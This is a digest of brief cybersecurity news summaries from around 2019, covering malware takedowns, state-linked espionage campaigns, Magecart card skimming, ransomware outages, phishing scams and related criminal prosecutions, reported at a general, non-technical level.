Avast worked in conjunction with US and French authorities to neutralize 850,000 infections caused by the Retadup malware, which had been distributing a malicious cryptocurrency miner and other malware to computers running the Windows operating system, mostly in Latin America. While analyzing Retadup, Avast identified a design flaw in the file that would allow removal of the malware from victims' computers, with the takeover of the command and control (C&C) server. Retadup's C&C infrastructure was mostly located in France, so the team worked with French authorities to stop the threat. Some parts of the C&C infrastructure were also located in the United States, so French authorities included the FBI. The worm's malicious C&C server has been replaced with a disinfection server that has caused the connected pieces of malware to self-destruct.
A previously unknown threat entity targeted critical infrastructure organizations without being detected for more than 12 months, the security team at Secureworks advised. The threat group, which may have first become active in April 2018, targets organizations in sectors of strategic national importance, including oil and gas and possibly telecommunications. Its activity is similar to other groups, including OilRig and Elfin, but the researchers suspect this is a new entity entirely. This new group has been dubbed "Hexane" (also known as LYCEUM) and typically accesses an organization using account credentials obtained via password spraying or brute-force attacks. Using compromised accounts, the threat actors send spearphishing emails with malicious Excel attachments to deliver the DanBot malware, which subsequently deploys post-intrusion tools.
Consumers should be aware of romance scams that are finding their way into inboxes. The Federal Trade Commission has produced a video and issued an alert to help consumers avoid such scams.
A campaign known as Heatstroke is using a multi-stage phishing attack to siphon private email addresses and eventually, payment credentials, the researchers at Trend Micro say. Heatstroke's multistage approach tries to mimic what a legitimate Web site would do to lull the potential victim into thinking nothing is amiss. The phishing kit's content is forwarded from another location, but masked to appear as if it was on the landing page itself. The researchers have learned that the phishing attack chain is dynamic, changing its routines depending upon the user's behavior.
The Internal Revenue Service (IRS) is warning taxpayers and tax professionals about an IRS impersonation scam campaign spreading nationally on email. The email subject line may vary, but examples use the phrase "Automatic Income Tax Reminder" or "Electronic Tax Return Reminder." The IRS reminds consumers that it never sends unsolicited emails and never emails taxpayers about the status of refunds.
Over 80 Web sites using the Magento ecommerce platform have been compromised to send payment card data via formjacking to servers under the control of the Magecart gang. Information gleaned by Arxan Technologies and the Aite Group found that 25% of the compromised sites were motorsports or luxury retail brands. Many of the sites were using older versions of Magento that were known to have vulnerabilities.
A US cyber attack on a database belonging to Iran's Islamic Revolutionary Guard Corps prevented the Iranian paramilitary from launching attacks on oil tankers in the Gulf region, the New York Times (NY Times) has learned. According to unnamed US officials, the June 20 attack knocked systems offline and Iran was still attempting to recover data and reestablish its military communications. The attacked database was used to determine which oil tankers to target.
Kenneth Currin Schuchman pled guilty to a hacking charge for operating the Satori botnet, which exploited vulnerabilities across 100,000 Internet of Things (IoT) devices, KrebsOnSecurity reported. Schuchman, a Vancouver, WA resident who used the online monikers "Nexus" and "Nexus-Zeta," built the botnet with at least two other individuals with leaked code from the Mirai botnet and used Satori in large-scale distributed denial-of-service attacks between July 2017 and October 2018. The botnet exploited vulnerabilities in routers, digital video recorders, and other IoT devices. Schuchman is facing up to 10 years in prison and fines up to $250,000 USD.
While the TA505 threat actor continues to use either the FlawedAmmyy remote access Trojan or the ServHelper malware as payloads, the entity has begun using .ISO image attachments as the point of entry; as well as a .NET downloader, a new style for macro delivery; a newer version of ServHelper; and a .DLL variant of FlawedAmmyy downloader. Trend Micro's research team has also observed TA505 targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.
A hacker took control of the Twitter account for the social media platform's CEO Jack Dorsey, using it to send offensive tweets. Some of the tweets used the hashtag #ChucklingSquad, which is thought to be the name of the hacking group responsible. Once hijacked, the @jack account spewed messages containing racial epithets and a retweet of a message in support of the Nazis, the AFP reported. Twitter said via tweet that Dorsey's account was "compromised due to a security oversight by the mobile provider" and had been secured. The messages were viewable for about a half hour.
The Gold Blackburn threat group is using Web injects from the Trickbot malware to take aim at Verizon Wireless, T-Mobile, and Sprint. When a victim navigates to the Web site of one of these organizations, the legitimate server response is intercepted by Trickbot and proxied through a command and control (C2) server. This C2 server injects additional HTML and JavaScript into the page, which is then rendered in the victim's Web browser. For all three carriers, injected code causes an additional form field that requests the user's PIN code. SecureWorks provided a write-up of this activity.
Trend Micro detected a spam campaign that uses compromised devices to attack vulnerable Web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to Web servers. The script sends an email with an embedded link to a scam site to specific email addresses. Some of the samples observed were used for spamming, for redirecting victims to cryptocurrency scams, and for spreading malware to vulnerable servers. The campaign has been seen targeting users in the UK.
Wikipedia was slammed by a massive cyber attack that began on September 6 and lasted nearly three days. Security mitigation company ThousandEyes was monitoring Wikipedia and recorded a "significant drop in HTTP server availability" worldwide and site access was lost in Europe, the Middle East, and Africa. It is not known how large the attack was but information from ThousandEyes shows that it was a standard distributed denial-of-service attack resulting in massive traffic floods. The Wikimedia Foundation, the parent company of Wikipedia, condemned the attacks.
A cyber attack targeting the Web site for the Oklahoma Law Enforcement Retirement System (OLERS) resulted in the theft of $4.2 million USD. The crime is being actively investigated by the FBI but a statement posted to the OLERS site said, "no pension benefits to members or beneficiaries have been impacted or put at risk. All benefits will continue to be paid in a timely fashion as always." OLERS administers retirement and medical benefits to Oklahoma law enforcement.
The Cybersecurity and Infrastructure Security Agency (CISA) has observed an increase in ransomware attacks across the nation. The organization released a document to provide details about ransomware, steps to take to prevent such attacks from occurring, and ways to recover if such incidents impact systems.
A known vulnerability exploited in a firewall used at an unnamed power utility in the western US resulted in communications outages after an attacker launched a denial-of-service attack at a low-impact control center and multiple remote low-impact generation sites. This information comes from E&E News, which obtained a copy of a Lesson Learned Report from the North American Electric Reliability Corporation (NERC). According to E&E News, the incident occurred on March 5 and impacted California, Wyoming, and Utah. The incident was brief, lasting less than five minutes, and firewall reboots occurred over a 10-hour period with each firewall being offline for less than five minutes. The report stated, " Given that a firmware update to address the exploited vulnerability had been released prior to the event, the entity's process for assessing and implementing firmware updates was reviewed. Based on this review, the entity decided to implement a more formal and more frequent review of vendor firmware updates that would be tracked within internal compliance tracking software. It should be noted that the entity was already working to develop internal procedures to support this process; however, these were not completed or being practiced at the time of the event." .
Symantec has linked two threat groups and now believes they are one and the same. Thrip, a Chinese espionage group, is using a previously unseen backdoor known as Hannotog and another backdoor known as Sagerunex. Analysis of Sagerunex shows close links to another long-established espionage group called Billbug (aka Lotus Blossom) and it is likely the two entities are the same. Since June 2018, Thrip has attacked at least 12 organization within Southeast Asia, including those in the military, maritime communications, education, and media sectors. The Hannotog backdoor has been in use since at least January 2017 and provides the attackers with a persistent presence on the victim's network. Sagerunex delivers remote access to the attackers.
A post from Trend Micro assesses what information individual cybercrime underground communities discuss in relation to threats and attacks. The Russian underground holds the most discussions on Internet of Things-related attacks while monetization is the main focus of this community. The Portuguese cybercriminal community is the second most active group and many members have discussed KL DNS, a redirection service that allows phishers to capture banking information from infected routers. Individuals in the English-speaking cybercriminal community are most interested in exploiting vulnerabilities, discussing exploit codes, and abusing connected printers.
Facebook removed multiple pages, groups, and accounts that were involved in coordinated inauthentic behavior, including two, unrelated operations that originated in Iraq and Ukraine. According to the report, six accounts, 120 Facebook Pages, one Group, two Events, and seven Instagram accounts were pulled down for engaging in domestic-focused coordinated inauthentic behavior in Iraq. In regards to Ukraine, Facebook removed 168 accounts, 149 Facebook Pages and 79 Groups for similar behavior. Facebook said in a statement, "We're taking down these Pages, Groups and accounts based on their behavior, not the content they posted. In each of these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves..."
A massive distributed denial-of-service (DDoS) attack hit a company in the gaming industry and peaked at 35 Gbps in bandwidth, Akamai reported. According to the vendor, this is the fourth largest DDoS attack it has ever encountered and the attack used a UDP Amplification technique known as WS-Discovery (Web Services Dynamic Discovery). WS-Discovery is a highly exploitable technique developed to ease consumer device network discovery and connectivity.
A threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools and illicit cryptomining malware. Analysis conducted by Cisco shows that Panda uses exploits previously utilized by the Shadow Brokers, a group that published information from the National Security Agency (NSA), and Mimikatz, an open-source credential-dumping program. Panda began employing new command and control and payload-hosting infrastructures around mid-August.
An Ohio gamer involved in a swatting incident that led to a death was sentenced to 15 months in prison, the Department of Justice (DOJ) announced. Nineteen-year-old Casey Viner pleaded guilty to one count of conspiracy and one count of obstructing justice. In his plea, Viner admitted he argued with co-defendant Shane Gaskill while playing Call of Duty World War II online. Viner contacted co-defendant Tyler Barriss and asked him to swat Gaskill. Viner, however, gave Barriss an incorrect address. Barriss then called police and reported a hostage situation at the address given to him. Law enforcement responded to the hoax call and shot and killed Andrew Finch, an innocent man. Barriss is serving a 20-year prison term. The incident took place in December 2017.
A previously undocumented attack group dubbed "Tortoiseshell" is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers' customers. Tortoiseshell has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
The Treasury Department's Office of Foreign Assets Control announced sanctions targeting three state-sponsored malicious cyber groups responsible for North Korea's malicious cyber activity on critical infrastructure. The department said that the Lazarus Group, Bluenoroff, and Andariel were responsible for cyber attacks on critical infrastructure and financial institutions and the 2018 WannaCry hack on the National Health Service in the UK. Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence, said, "Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs."
A Sednit (also known as APT28, Fancy Bear, Sofacy, and STRONTIUM) campaign launched on August 20 to take aim at embassies and ministers of foreign affairs in Eastern European and Central Asian countries, ESET's scientists learned. The campaign, which has been previously illustrated by the security team at Telsy TRT, started with a phishing email containing a malicious attachment that delivered a long chain of downloaders, ending with a backdoor. ESET discovered that Sednit added the Nim language to its toolset for use in its downloader, updated its Golang download malware, and rewrote its backdoor from Delphi into Golang.
Threat actors launched cyber attacks on the European aerospace company Airbus, unnamed sources told AFP. There have been four attacks which began in 2018 and continued into 2019. The sources said that Rolls-Royce, French technology consultancy Expleo, and two French contractors working for Airbus were the targets. Several of the unnamed individuals said that the attackers appeared to be looking for technical documentation that links to the certification process for Airbus aircraft components. The hackers also stole documents related to the turbo prop engines used in Airbus military planes and details on the propulsion systems and avionics systems for the Airbus A350 passenger plane. Although it is not clear which threat entity is behind these attacks, the sources pointed to Chinese hackers. Airbus did not respond to the report. Rolls-Royce would not comment on specifics of any attack and Expleo refused to confirm or deny the events.
Andrei Tyurin, the Russian man responsible for infiltrating the data for more than 100 million individuals via a massive hacking campaign that hit JPMorgan Chase, has pled guilty to six counts, including computer hacking conspiracy and bank fraud, the Department of Justice (DOJ) announced. The scheme took place between 2012 and 2013 and compromised the data for over 100 million financial customers, including 83 million from JPMorgan Chase. Charges against three other individuals involved in this hack are pending.
Kaspersky has uncovered a widespread malicious email campaign aimed at stealing Microsoft user account credentials allowing attackers to access private, corporate information. Executed via an elaborate spam message, these attacks target employees working for large organizations that use business messengers with a function to exchange voice messages and receive voice message notifications through corporate emails. The attack is aimed specifically at corporate mail users and its purpose is to access important business correspondence and confidential commercial data.
A campaign known as POISON CARP is to blame for attacks on senior members of Tibetan groups. These individuals, as revealed by the Citizen Lab team, received malicious links in individually tailored WhatsApp text exchanges with operators posing as non-governmental organization workers, journalists, and other fake personas. The links led to code designed to exploit Web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. The attacks took place between November 2018 and May. POISON CARP employed a total of eight Android browser exploits, an Android spyware kit, one iOS exploit chain, and iOS spyware.
US military veterans are being targeted by the Tortoiseshell threat actor via a fake Web site, Cisco has confirmed. The threat group deployed a Web site designed to help US military vets find job and the site looked close to a legitimate service offered by the Department of Commerce. The site prompted users to download an app, which was actually a malicious downloader, deploying spying tools and other malware, including a remote access Trojan called IvizTech.
A suspected Chinese advanced persistent threat group is conducting attacks against technology companies located in Southeast Asia. The threat actors deployed a modified version of the Chinese open-source backdoor called PcShare, which is designed to operate when side-loaded by a legitimate NVIDIA application. According to BlackBerry Cylance, the attackers also deploy a Trojanized screen reader application, replacing the built-in Narrator "Ease of Access" feature in Windows. This backdoor allows them to surreptitiously control systems via remote desktop logon screens without the need for credentials.
Between May and June, Palo Alto Networks observed previously unknown malicious tools used in the targeting of transportation and shipping organizations based in Kuwait. The activity has been dubbed "xHunt" because the threat actor named the tools after character names from the anime series Hunter x Hunter. These tools use HTTP for their command and control (C2) channels and certain variants use DNS tunneling or emails to communicate with the C2 as well. It is likely that this campaign is related to a similar one documented by IBM in 2018.
Check Point Software studied a targeted attack against journalists and human rights activists in Egypt that had been previously reported on by Amnesty International in March. According to the Check Point team, unknown or previously undisclosed malicious artifacts belonging to this operation were uncovered. The attackers began developing mobile applications to monitor their targets and hosted them on Google Play. Upon notification, Google removed the malicious apps. The attacks have been ongoing since at least 2018 and many of the victims are political and social activists, high-profile journalists, and members of non-profit organizations in Egypt.
Prevailion has uncovered new details concerning the MasterMana Botnet, which uses business email compromise schemes and backdoors to pilfer cryptocurrency wallets and has been in operation since at least December 2018. This campaign is attributed to the Gorgon Group, a well-known threat and intelligence entity. The operation's phishing emails revealed infected document attachments. Opening the infected document initiated the attack's multi-pronged, labyrinth-like kill-chain which aids in detection evasion by relying upon trust placed third-party Web sites and services, such as Bitly, Blogspot, and Pastebin. The threat actors also modified older Pastebin posts to cease execution and added features to avoid sandboxing. Ultimately, the victim would download a .NET dll that would perform process hollowing and load a fileless backdoor, either a variant of the Azorult malware or the Revenge remote access Trojan.
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis. Attor's GSM (Global System for Mobile Communications) plugin uses the AT command protocol and then uses Tor for its network communications for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor is primarily targeting Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library provided by Volusion to its client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
RiskIQ has warned that the Magecart group is becoming a serious threat, as the entity's skimmers have appeared over two million times and breached over 18,000 hosts. Magecart's average breach length is 22 days and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in email addresses that were used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israeli-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that if clicked would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their activities more effective.
Chinese hackers coordinated a multi-year campaign to obtain information on the components used in the Comac C919 aircraft, which cost less than its competitors and made its maiden flight in 2017, following years of delays due to design flaws. CrowdStrike released a report that the Chinese state-aligned adversary TURBINE PANDA conducted cyber intrusions from roughly 2010 to 2015 against several of the companies that make the C919's various components. The goal was to obtain all the intelligence needed to manufacture the C919 components in China. The campaign included two parts: actual hacking and recruiting employees who worked at the targeted aviation companies. Among those targeted and compromised were Safran Group, Honeywell, and GE. According to the analysis, "Beijing uses a multifaceted system of forced technology transfer, joint ventures, physical theft of intellectual property from insiders, and cyber-enabled espionage to acquire the information it needs."
Alleged hacker Anthony Tyler Nashatka was arraigned in federal court on charges of conspiracy to commit computer fraud and abuse, conspiracy to commit wire fraud, aggravated identity theft and other charges related to a scheme to defraud victims of at least $1.4 million USD in cryptocurrency in December of 2017, the Department of Justice (DOJ) announced. According to an indictment, Nashatka conspired to target a cryptocurrency exchange platform to obtain the private keys and other information of hundreds of its users as part of a scheme to steal the users' cryptocurrency. The indictment further describes how the defendants unlawfully used the identity of a victim to gain access to the platform's domain name settings, caused the transmission of a command to disable all of the cryptocurrency company's servers, diverted users from the actual platform to a fake website, and fraudulently induced victims to input their cryptocurrency addresses and private keys into the fake Web site.
Imperva admitted that a misconfiguration is to blame for a security breach affecting "a subset" of its Cloud Web Application Firewall (WAF) customers. "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords. Kunal Anand, Imperva's chief technology officer, said, "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS (Amazon Web Services) accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords." The breach was discovered in August and the incident is not related to a vulnerability in the Cloud WAF product.
Kaspersky honeypots detected 105 million attacks on Internet of Things (IoT) devices coming from 276,000 unique IP addresses in the first six months of 2019, a figure nearly nine times greater than the number found in the same period of 2018. The findings come from Kaspersky's IoT: A Malware Story report on honeypot activity in H1 2019. The report found that attacks on IoT devices are generally not sophisticated but are stealthy, leaving users unaware that their devices are being exploited. The Mirai malware was used in 39% of the attacks while Nyadrop was seen in 38.57% of attacks.
A ransomware attack hit Pitney Bowes, resulting in encrypted information and disrupted access for clients, the shipping services company said in a statement. "We have seen no evidence that customer accounts or data have been impacted," the company said. Customers will not be able to refill postage meters but can print postage if they have funds loaded in the system. Mailing system products and Your Account access are impacted by this attack.
Investigation into the TA407 (also known as Silent Librarian, Cobalt Dickens, and Mabna Institute) threat actor shows that its targeting phishing attacks at specific universities in North America and Europe. TA407 uses well-crafted social engineering mechanisms including: stolen university branding, fake email signatures/credentials/addresses, university-specific email bodies/portal clones, and themed subject lines. Proofpoint noted that TA407 takes advantage of publicized downtime and weather alerts, among other events, to add credibility to the phish.
The Dukes (also known as APT29 and Cozy Bear) threat group appeared to take a hiatus but the entity has reemerged with new malware implants in ongoing activities that ESET has dubbed "Operation Ghost." This campaign, which appears to have become active in 2013 and is ongoing, is using three malware implants - PolyglotDuke, RegDuke, and FatDuke - and has compromised the ministries of foreign affairs in at least three European countries. At least one European country's embassy in Washington, DC has also been affected. In Operation Ghost, the Dukes have used a limited number of tools but have utilized persistence, a four-stage, sophisticated malware platform, and have avoided communicating with the same command and control infrastructure between different victims.
ESET published details regarding new Winnti Group activities, including that the threat entity uses a packer called PortReuse to target specific organizations. The Winnti Group, which was responsible for the ShadowHammer supply chain attacks, also utilizes a VMProtected packer that decrypts position-independent code using RC5, with a key based on a static string and the volume serial number of the victim's hard drive, and runs it directly. The group uses the ShadowPad malware and a custom version of the XMRig crytptocurrency miner as payloads
Scientists at Malwarebytes have connected the Carbanak threat gang to the Magecart Group 5 cybercriminal group and Dridex phishing campaigns. Magecart is a group of affiliates who use malicious JavaScript to steal payment data from shoppers, mostly on checkout pages. Magecart Group 5 targets the supply chain used by online merchants. While analyzing Magecart Group 5's domains, Malwarebytes noticed several that connected to Dridex phishing campaigns. Dridex, a well-known banking Trojan, has often been used as an initial infection vector in attacks that deliver the Carbanak malware as the payload. The Carbanak gang use the malware of the same name.
The Federal Trade Commission (FTC) has barred the developers of three stalking apps from selling apps that monitor consumers' mobile devices unless they take certain steps to ensure the apps will only be used for legitimate purposes. The FTC alleges that Retina-X and its owner, James N. Johns, Jr., developed three mobile device apps that allowed purchasers to monitor the mobile devices on which they were installed, without the knowledge or permission of the device's user. The apps - known as MobileSpy, PhoneSheriff, and TeenShield - allowed purchasers to access sensitive information about device users, including the user's physical movements and online activities. At the same time, devices on which the apps were installed were exposed to security vulnerabilities.
An October 17 malware attack on financial services provider Billtrust resulted in an outage of the company's services, Bleeping Computer reported. Although the company did not publicly acknowledge the attack, customer Wittichen Supply announced that it had been notified by Billtrust of the malware incident. According to Wittichen Supply, no customer data was impacted and services were in the process of being restored from backups. An anonymous source told Bleeping Computer that Billtrust was affected by the BitPaymer ransomware.
The National Security Agency (NSA) and the UK's National Cyber Security Center (NCSC) released a joint advisory on the Turla (also known as Waterbug and Venomous Bear) advanced persistent threat group that is widely thought to be associated with Russia. Previous advisories from the NCSC detailed Turla's use of Neuron and Nautilus implants and an ASPX-based backdoor alongside the Snake rootkit. Since those advisories were published, the NCSC, NSA, and partner-shared analysis of additional victims and infrastructure determined the Neuron and Nautilus tools were very likely Iranian in origin. Those behind Neuron or Nautilus were almost certainly not aware of, or complicit with, Turla's use of their implants. After acquiring the tools and the data needed to use them operationally, Turla first tested them against victims they had already compromised using their Snake toolkit, and then deployed the Iranian tools directly to additional victims.
A Texas man who was found guilty of hacking into the Los Angeles Superior Court (LASC) computer system, using the system to send approximately two million malicious phishing emails, and fraudulently obtaining hundreds of credit card numbers was sentenced to 145 months in federal prison. The Department of Justice (DOJ) announced that Oriyomi Sadiq Aloba and his co-conspirators targeted the LASC for a phishing attack. During the attack, the email account of one court employee was compromised and used to send phishing emails to coworkers purporting to be from the file-hosting service Dropbox. The email contained a link to a bogus Web site that asked for the users' LASC email addresses and passwords. Thousands of court employees received the Dropbox email, and hundreds disclosed their email credentials to the attacker. The compromised email accounts then were used to send millions of phishing emails.
Microsoft tracked new attacks linked to the Strontium (also known as Sofacy, Fancy Bear, and APT28) threat entity that focused on anti-doping authorities and sporting organizations around the world. At least 16 national and international sporting and anti-doping organizations across three continents were targeted in these attacks which began September 16. The methods used in the attacks are similar to the those previously used by Strontium: spear phishing, password spray, exploiting Internet-connected devices, and the use of both open-source and custom malware.
Group-IB uncovered a database holding more than 1.3 million credit and debit card records of mostly Indian banks' customers that was uploaded to Joker's Stash on October 28. The underground market value of the database is estimated at more than $130 million USD. Joker's Stash is an underground credit card shop. This particular dump, in which 98% of the cards belong to Indian banks, can be used to produce cloned cards for further cashouts.
Lookout has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but the attack is still ongoing. The infrastructure connected to this attack has been live since March. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign, which is using keylogging and a mobile-aware functionality.
While researching a malware sample spread by the Rig exploit kit (EK), the researchers at Check Point Software were led to the HackForums underground market where they learned about the hacking community and the EK itself in some detail. The scientists discovered that a new hacker can easily start up a business after joining an underground forum and buying different cyber attack products. Additionally, Rig EK miscreants are actively reselling the exploitation service to different customers on different "flows" and providing them with a Rig public statistics link. This allows customers to re-resell this service to their own customers and distribute whatever variant they have.
A phishing scam targeting users of the Steam online gaming platform has spiked since June, the researchers at Kaspersky say. Attackers lure users to sites that mimic or copy online stores linked to Steam that sell in-game items. The fake resources are high-quality, making it difficult to distinguish them from the real thing.
Cisco's Talos researchers discovered a server hosting a large stockpile of malicious files. Analysis of these files shows that the attackers were able to obtain a deep level of access to victims' infrastructure, enabling Talos to identify several targets of these attacks, including one American manufacturing company. The server contained a number of malicious files, including the DopplePaymer ransomware, the TinyPOS credit card scraping malware, and loaders that execute code delivered from the command and control server. The attack targets have been notified. According to the analysis, the attacker appears to be targeting medium-sized companies in the industrial space.
Cisco Talos discovered several malware distribution campaigns where the adversaries were utilizing the names and likenesses of prominent political figures, including President Trump, Hillary Clinton, and Vladimir Putin. Some of the applications are designed to coerce victims into paying ransom demands, while others could be used to gain backdoor access to systems and provide attackers the ability to operate within organizational networks.
The US Department of Justice (DOJ) has exposed a major iPhone and iPad fraud ring operating out of California. The agency raided two businesses and several homes in Mira Mesa and Mission Hills, California, seizing over $250,000 in cash and 90 iPhones that may include counterfeit parts. Apparently, the operation revolved around acquiring counterfeit iPhone and iPads from China, importing them to the US, and then intentionally breaking those devices and having them replaced, under warranty, by Apple, with genuine iPhones and iPads. The legitimate units were then being returned to China for sale. The crime was allegedly perpetrated by three brothers, Zhiwei Loop Liao, Zhimin Liao, and Zhiting Liao, all of whom are considered fugitives at the time of writing. An additional 11 individuals have been charged in the case, which is believed to have moved more than 10,000 iPhones and iPads during its time in operation. According to the DOJ, it was able to escape detection for this long by acquiring legitimate IMEI (International Mobile Equipment Identity) numbers from real Apple products and applying them to the counterfeit devices before turning them in for replacement.
The APT33 adversary has been tracked using about 12 command and control servers to highly target its attacks and implements multiple layers of obfuscation to avoid detection. Targeted campaigns were by Trend Micro's team of researchers targeting organizations in the Middle East, the US, and Asia. Among the active infections in 2019 are two separate locations for a private American company that offers services related to national security, victims connecting from a university and a college in the US, a victim most likely related to the US military, and several victims in the Middle East and Asia.
The Royal Canadian Mounted Police (RCMP) announced charges against John Paul Revesz from Toronto for allegedly operating an international malware scheme under the company name "Orcus Technologies." An RCMP criminal investigation began in July 2016 after reports of a significant amount of computers were being infected with a remote access Trojan. A search warrant was executed at the accused's residence in March 2019 and electronic devices were seized and later analyzed. The evidence obtained shows that this virus infected computers from around the world, victimizing thousands of people in multiple countries.
A Russian national has been extradited to the US to face charges for running a criminal online marketplace that facilitated payment card fraud, computer hacking, and other crimes, the Justice Department (DOJ) announced. Aleksei Burkov allegedly ran a Web site called "Cardplanet" that sold payment card numbers that had been stolen primarily through computer intrusions. Many of the cards offered for sale belonged to US citizens. The stolen data from more than 150,000 compromised payment cards was allegedly sold on Burkov’s site and has resulted in over $20 million USD in fraudulent purchases made on US credit cards. Additionally, Burkov allegedly ran another online cybercrime forum that served as an invite-only club where elite cybercriminals could meet and post in a secure location to plan various cybercrimes, to buy and sell stolen goods and services.
The Justice Department (DOJ) announced that Sergiy P. Usatyuk of Orland Park, IL has been sentenced to 13 months in prison, followed by three years of supervised release on one count of conspiracy to cause damage to Internet-connected computers for his role in owning, administering, and supporting illegal booter services that launched millions of illegal distributed denial-of-service (DDoS) attacks against victim computer systems in the United States and elsewhere. According to the criminal information, Usatyuk combined with a co-conspirator to develop, control, and operate a number of booter services and booter-related Web sites from around August 2015 through November 2017 that launched millions of DDoS attacks that disrupted the Internet connections of targeted victim computers, rendered targeted Web sites slow or inaccessible, and interrupted normal business operations.
Louisiana's state government was crippled by a ransomware attack that affected the Office of Motor Vehicles (OMV), the Department of Health, and the Department of Transportion and Development. The attack began on November 18 and resulted in the shuttering of various state Web sites. Some services were shutdown as a precautionary measure. According to Fox 8 News, business at all 79 OMV locations came to a halt. An official said that ransomware was to blame but that the state had not paid the ransom nor did it appear that any key data had been locked. Governor John Bel Edwards tweeted that he had mobilized the state's cybersecurity team to help disrupt the attack.
Security researcher Brian Krebs learned that National Veterinary Associates (NVA), a company that owns over 700 animal care facilities around the globe, has been victimized by a ransomware attack that affected more than half of its practices. Although NVA declined to comment on the malware or whether it had paid the ransom, KrebsOnSecurity learned that the incident was discovered on October 27 and that two forensic firms were hired to investigate. An anonymous source told Krebs that the Ryuk ransomware was to blame and that an earlier ransomware attack, which occurred a few months prior, had also involved Ryuk. Approximately 400 NVA locations have been affected.
More than 20 hotels in Latin America, Europe and Asia have fallen victim to targeted malware attacks conducted by several threat entities including RevengeHotels The campaign, which has been active since 2015 but has increased its presence since January, includes different groups using traditional remote access Trojans (RATs) to infect businesses in the hospitality sector. Research from Kaspersky shows that at least two groups, RevengeHotels and ProCC, were identified to be part of the campaign; however, more cybercriminal groups are potentially involved. The main attack vector includes emails with crafted malicious documents attached. Some of them exploit a bug in Windows, loading it using VBS and PowerShell scripts. It then installs customized versions of various RATs and other custom malware, such as ProCC, on the victim's machine that could later execute commands and set up remote access to the infected systems.
Check Point Software uncovered an elaborate business email compromise scheme that involved an entity using highly sophisticated tactics - including email communications - to trick both parties and steal $1 million USD. The case involves two legitimate companies - a Chinese venture capital fund and an Israeli startup - and a wire transfer. After realizing the theft, the startup tapped Check Point for help. Upon analysis, Check Point determined that the attacker had spotted the correspondence between the two companies ahead of the anticipated wire transfer and set up two lookalike domains to resemble the legitimate companies. The attacker then began corresponding with both the venture capital fund and the startup, spoofing the email addresses of each company. Check Point's Matan Ben David said, "This infrastructure gave the attacker the ability to conduct the ultimate Man-In-The-Middle (MITM) attack. Every email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination."
A hacking tool that was able to give full remote control of a victim's computer to cybercriminals has been taken down as a result of an international law enforcement operation targeting the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The investigation, led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, resulted in an operation involving numerous judicial and law enforcement agencies. The tool had been used across 124 countries and sold to over 14,000 buyers but it can no longer be used by anyone who purchased it. The IM-RAT once installed undetected, gave cybercriminals free rein to the victim's machine. It sold for as little as $25 USD.
KrebsOnSecurity reported that four million payment cards gleaned from a breach of four restaurant chains are for sale on the Joker's Stash, a cybercriminal underground market. Two financial industry sources told researcher Brian Krebs that the payment cards had all been used at Krystal, Moe's, McAlister's Deli, and Schlotsky's. Krystal confirmed in October that it had been breached while the other restaurants are all part of the same parent company and announced breaches in August.
